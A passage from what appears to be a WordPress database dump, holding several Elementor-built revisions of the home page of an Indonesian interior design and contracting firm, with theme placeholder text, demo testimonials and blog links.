Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 09:15:52','2023-09-22 09:15:52','',22,'https://bauhaus.futuremediatrix.com/?p=4892',0,'revision','',0),(4893,3,'2023-09-22 09:15:52','2023-09-22 09:15:52','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>\"Let\'s turn your ideas into reality\"</p><p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 09:15:52','2023-09-22 09:15:52','',22,'https://bauhaus.futuremediatrix.com/?p=4893',0,'revision','',0),(4895,3,'2023-09-22 09:30:04','2023-09-22 09:30:04','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>\"Let\'s turn your ideas into reality\"</p><p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a 